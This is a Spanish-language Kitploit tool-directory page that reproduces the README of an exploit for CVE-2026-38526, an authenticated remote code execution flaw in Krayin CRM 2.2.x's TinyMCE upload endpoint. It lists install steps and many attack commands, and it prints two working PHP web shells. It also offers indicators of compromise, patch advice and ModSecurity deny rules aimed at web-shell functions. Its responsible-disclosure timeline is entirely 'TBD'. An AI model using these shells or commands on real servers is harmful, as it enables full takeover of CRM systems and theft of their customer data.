Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
KrayinCRM-RCE-Exploit-CVE-2026-38526 — Exploit para CVE-2026-38526 en Krayin CRM v2.2.x - RCE autenticado mediante bypass de carga de archivos en TinyMCE. Incluye shell interactiva, payloads de múltiples tipos, generación automática de shell y verificación. Autor: Sudeepa Wanigarathna. Solo para pruebas autorizadas. | Kitploit
Herramientas/GitHubGitHub/cerberusmrxi/krayincrm-rce-exploit-cve-2026-38526
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingGeneración de Shellcode
GitHubcerberusmrxi/krayincrm-rce-exploit-cve-2026-38526

KrayinCRM-RCE-Exploit-CVE-2026-38526

Exploit para CVE-2026-38526 en Krayin CRM v2.2.x - RCE autenticado mediante bypass de carga de archivos en TinyMCE. Incluye shell interactiva, payloads de múltiples tipos, generación automática de shell y verificación. Autor: Sudeepa Wanigarathna. Solo para pruebas autorizadas.

Ver Repositorio
38hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🔓 Krayin CRM v2.2.x - Exploit de Ejecución Remota de Código Autenticado

License: MIT CVE-2026-38526

⚠️ SOLO PARA PRUEBAS DE SEGURIDAD AUTORIZADAS - El uso no autorizado es ilegal y poco ético.

📋 Resumen

Esta herramienta de explotación demuestra una vulnerabilidad crítica de ejecución remota de código (RCE) autenticada descubierta en Krayin CRM versión 2.2.x. La vulnerabilidad existe en la funcionalidad de carga de archivos de TinyMCE, que permite a administradores autenticados cargar y ejecutar código PHP arbitrario en el servidor.

PropiedadValor
ID CVECVE-2026-38526
Software afectadoKrayin CRM v2.2.x
Tipo de vulnerabilidadEjecución Remota de Código Autenticada (RCE)
Autenticación requeridaSí (Acceso a nivel de administrador)
ImpactoCompromiso completo del sistema
Puntuación CVSS8.8 (Alto)

🚨 Detalles de la Vulnerabilidad

La vulnerabilidad se origina por una validación insuficiente del tipo de archivo en el endpoint de carga de archivos de TinyMCE (/admin/tinymce/upload). Un administrador autenticado puede:

  • Cargar un archivo PHP disfrazado con un tipo MIME de imagen.
  • El archivo se almacena en una ubicación accesible desde la web.
  • El atacante puede entonces ejecutar código PHP arbitrario en el servidor.

Versiones Afectadas

  • Krayin CRM 2.2.0
  • Krayin CRM 2.2.1
  • Krayin CRM 2.2.2
  • Todas las versiones 2.2.x anteriores al parche de lanzamiento

✨ Características

  • Múltiples tipos de shell: Básico, Avanzado, Mínimo, Administrador de Archivos y Personalizado.
  • Shell interactiva: Interfaz similar a terminal completa con historial de comandos.
  • Carga de archivos: Cargar archivos adicionales a través de la shell.
  • Extracción de token CSRF: Manejo automático de la protección CSRF.
  • Soporte de proxy: Enrutar tráfico a través de proxies HTTP/HTTPS.
  • Formatos de salida flexibles: Texto, JSON o modo Silencioso.
  • Lógica de reintento: Reintento automático en fallos de conexión.
  • Cabeceras personalizadas: Soporte para cabeceras HTTP personalizadas.
  • Modo detallado: Salida de depuración detallada.
  • Soporte SSL: Verificación opcional de certificados SSL.

📦 Instalación

Requisitos

  • bash
  • Python 3.7+
  • pip install httpx beautifulsoup4 colorama

Instalación Rápida

root@kitploit:~
git clone https://github.com/CerberusMrXi/KrayinCRM-RCE-Exploit-CVE-2026-38526/.git
cd KrayinCRM-RCE-Exploit-CVE-2026-38526
pip install -r requirements.txt

Archivo de Requisitos (requirements.txt)

root@kitploit:~
httpx>=0.24.0
beautifulsoup4>=4.12.0
colorama>=0.4.6

🚀 Uso

Sintaxis Básica del Comando

root@kitploit:~
python3 exploit.py -t <TARGET_URL> -u <USUARIO> -p <CONTRASEÑA> [OPCIONES]

Parámetros Requeridos

ParámetroDescripción
-t, --targetURL objetivo (ej., http://192.168.1.100)
-u, --usernameNombre de usuario o correo del administrador
-p, --passwordContraseña del administrador

Ejemplos de Uso Comunes

root@kitploit:~
# Explotación básica con shell generada
python3 exploit.py -t http://target.com -u [email protected] -p password

# Cargar archivo PHP de shell personalizado
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php

# Generar shell avanzada con modo interactivo
python3 exploit.py -t http://target.com -u [email protected] -p password --shell-type advanced -i

# Generar archivo de shell sin explotación
python3 exploit.py -t http://target.com -u [email protected] -p password --generate-only --shell-type advanced -o my_shell.php

# Usar con proxy para pruebas/depuración
python3 exploit.py -t http://target.com -u [email protected] -p password --proxy http://127.0.0.1:8080

# Salida JSON para automatización
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php -o json

# Modo detallado con tiempo de espera personalizado
python3 exploit.py -t http://target.com -u [email protected] -p password -v --timeout 60

# User-Agent y cabeceras personalizadas
python3 exploit.py -t http://target.com -u [email protected] -p password --user-agent "CustomUA/1.0" --header "X-Forwarded-For: 127.0.0.1"

🐚 Tipos de Shell

  1. Shell Básica (basic) Ejecución simple de comandos con la función system().

    root@kitploit:~
    <?php if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>
    
  2. Shell Avanzada (advanced) Shell rica en funciones con:

    • Múltiples métodos de ejecución de comandos
    • Interfaz web tipo terminal atractiva
    • Soporte para historial de comandos
    • Visualización del usuario actual y nombre del host
  3. Shell Mínima (minimal) Huella mínima para sigilo.

    root@kitploit:~
    <?php system($_GET["cmd"]); ?>
    
  4. Administrador de Archivos (file_manager) Interfaz completa de gestión de archivos:

    • Carga de archivos
    • Eliminación de archivos
    • Creación de directorios
    • Navegación
    • Visualizador de permisos de archivos
  5. Shell Personalizada (custom) Usa tu propio archivo PHP de shell con el parámetro -f.

📝 Formatos de Salida

Formato Texto (Predeterminado)

Salida coloreada legible para humanos, adecuada para uso interactivo.

Formato JSON (-o json)

Formato legible por máquinas para automatización e integración.

root@kitploit:~
{
  "success": true,
  "shell_url": "http://target.com/shell.php",
  "upload_url": "/storage/upload/shell.php",
  "message": "Upload successful",
  "timestamp": 1699123456.789,
  "details": {
    "status_code": 200,
    "response": "..."
  }
}

Formato Silencioso (-q, --quiet)

Sin salida excepto errores. Útil para procesamiento por lotes.

⚙️ Opciones Avanzadas

OpciónDescripciónPredeterminado
--timeoutTiempo de espera de solicitud en segundos30
--retryNúmero de intentos de reintento3
--retry-delayDemora entre reintentos en segundos2
--user-agentCadena User-Agent personalizadaUA de navegador predeterminado
--headerCabeceras HTTP personalizadas (Clave: Valor)Ninguna
--verify-sslVerificar certificados SSLFalso
--proxyURL de proxy HTTP/HTTPSNinguno
-v, --verboseHabilitar salida de depuraciónFalso
-q, --quietSuprimir toda la salidaFalso

Ejemplo de Cabeceras Personalizadas

root@kitploit:~
--header "X-Custom-Header: value" --header "User-Agent: CustomUA/1.0"

🔒 Detección y Prevención

Señales de Compromiso (IoC)

  • Archivos a Monitorear:

    • Archivos PHP inusuales en public/storage/upload/
    • Archivos con extensiones dobles (ej., image.php.jpg)
    • Archivos nuevos con nombres sospechosos
  • Registros a Revisar:

    • Solicitudes POST a /admin/tinymce/upload
    • Horarios de inicio de sesión de administradores inusuales
    • Intentos fallidos de autenticación
  • Indicadores del Sistema:

    • Procesos inesperados ejecutándose
    • Nuevos trabajos cron
    • Archivos del sistema modificados

Medidas de Prevención

  • Acciones Inmediatas:

    root@kitploit:~
    # Actualizar a la versión parcheada
    composer update krayin/crm
    
    # Deshabilitar acceso de administrador temporalmente
    # Eliminar cuentas de administrador innecesarias
    # Cambiar todas las contraseñas de administrador
    
  • Endurecimiento de Carga de Archivos:

    root@kitploit:~
    // Validar tipo de archivo por contenido, no solo por extensión
    // Implementar política de seguridad de contenido
    // Usar Firewall de Aplicaciones Web (WAF)
    // Habilitar escaneo de carga de archivos
    
  • Control de Acceso:

    root@kitploit:~
    # Restringir IPs de administrador en .htaccess
    # Implementar MFA para cuentas de administrador
    # Auditoría regular de administradores
    # Políticas de tiempo de espera de sesión
    
  • Reglas WAF (ModSecurity):

    root@kitploit:~
    # Bloquear cargas de archivos sospechosas
    SecRule FILES "\.(php|phtml|php[0-9])" "id:1001,deny,status:403,msg:'Carga de archivo PHP bloqueada'"
    
    # Bloquear shells web
    SecRule ARGS "system|exec|shell_exec|passthru" "id:1002,deny,status:403,msg:'Comando de shell bloqueado'"
    

🛡️ Divulgación Responsable

Esta vulnerabilidad fue descubierta a través de investigación de seguridad responsable. El proceso de divulgación siguió estos pasos:

  • Descubrimiento: Vulnerabilidad identificada durante evaluación de seguridad.
  • Verificación: Confirmada la vulnerabilidad en Krayin CRM 2.2.x.
  • Informe: Notificado a los desarrolladores de Krayin CRM de forma privada.
  • Coordinación: Trabajado con el equipo para desarrollar una corrección.
  • Parche: Esperando el lanzamiento oficial del parche.
  • Divulgación: Divulgación pública después de la disponibilidad del parche.

Cronología

  • Descubrimiento: TBD
  • Informado: TBD
  • Parche Lanzado: TBD
  • Divulgación Pública: TBD

📜 Descargo de Responsabilidad

root@kitploit:~
THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESSED OR IMPLIED WARRANTIES, 
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY 
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 
THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 
EXEMPLARY, OR CONSEQUENTIAL DAMAGES ARISING IN ANY WAY OUT OF THE USE 
OF THIS SOFTWARE.

USE OF THIS TOOL FOR ANY PURPOSE OTHER THAN AUTHORIZED SECURITY TESTING 
IS ILLEGAL AND UNETHICAL. THE AUTHOR TAKES NO RESPONSIBILITY FOR 
UNAUTHORIZED USE OR ANY DAMAGES CAUSED BY THIS TOOL.

🔧 Solución de Problemas

Problemas Comunes

  • Problema: Falla de autenticación

    • Solución: Verifica las credenciales, asegúrate de que la ruta de inicio de sesión del administrador sea /admin/login
    • Revisión: Asegúrate de que la extracción del token CSRF funcione correctamente
  • Problema: Falla en la carga de archivos

    • Solución: Revisa los permisos de archivos, verifica que el endpoint de carga exista
    • Revisión: Asegúrate de que el objetivo use el editor TinyMCE
  • Problema: La shell no ejecuta comandos

    • Solución: Verifica que las funciones PHP no estén deshabilitadas en php.ini
    • Revisión: Prueba con un comando simple como echo test
  • Problema: Errores de certificado SSL

    • Solución: Usa la bandera --verify-ssl o desactiva la verificación
    • Nota: Los certificados autofirmados causarán errores sin la verificación adecuada

Modo de Depuración

root@kitploit:~
# Habilitar registro detallado
python3 exploit.py -t http://target.com -u admin -p pass -v

# Con proxy (Burp Suite, etc.)
python3 exploit.py -t http://target.com -u admin -p pass --proxy http://127.0.0.1:8080

🤝 Contribuciones

¡Las contribuciones son bienvenidas! Por favor, asegúrate de:

  • Todo el código esté debidamente probado.
  • La documentación esté actualizada.
  • Se sigan las pautas éticas.
  • La investigación de vulnerabilidades se realice de manera responsable.

📚 Referencias

  • Sitio web oficial de Krayin CRM
  • CVE-2026-38526
  • OWASP Ejecución Remota de Código
  • Mejores Prácticas de Seguridad PHP

⭐ Apoyo

Si encuentras útil esta herramienta para la investigación de seguridad, por favor considera:

  • ⭐ Darle estrella al repositorio
  • 🔔 Seguir para actualizaciones
  • 📢 Compartir con otros investigadores de seguridad

Creado con ❤️ para la Investigación de Seguridad

Recuerda: Un gran poder conlleva una gran responsabilidad. ¡Usa este conocimiento sabiamente!

📊 Tarjeta de Referencia Rápida de Comandos

root@kitploit:~
# Referencia rápida
python3 exploit.py -t URL -u USER -p PASS [OPCIONES]

# Opciones:
#   -f FILE           Cargar shell personalizada
#   --shell-type TYPE Básica|Avanzada|Mínima|Administrador_de_Archivos|Personalizada
#   -i                Modo interactivo
#   --proxy URL       Proxy HTTP
#   -v                Salida detallada
#   -o json           Salida JSON
#   --generate-only   Crear shell sin explotar
#   --timeout SEC     Tiempo de espera de solicitud
#   --retry N         Número de reintentos
#   --user-agent UA   User-Agent personalizado
#   --header "K: V"   Cabeceras personalizadas
#   --verify-ssl      Verificar certificados SSL
#   -q, --quiet       Suprimir salida

🔒 Recuerda: ¡Siempre obtén permiso por escrito antes de probar cualquier sistema!

Descargar herramienta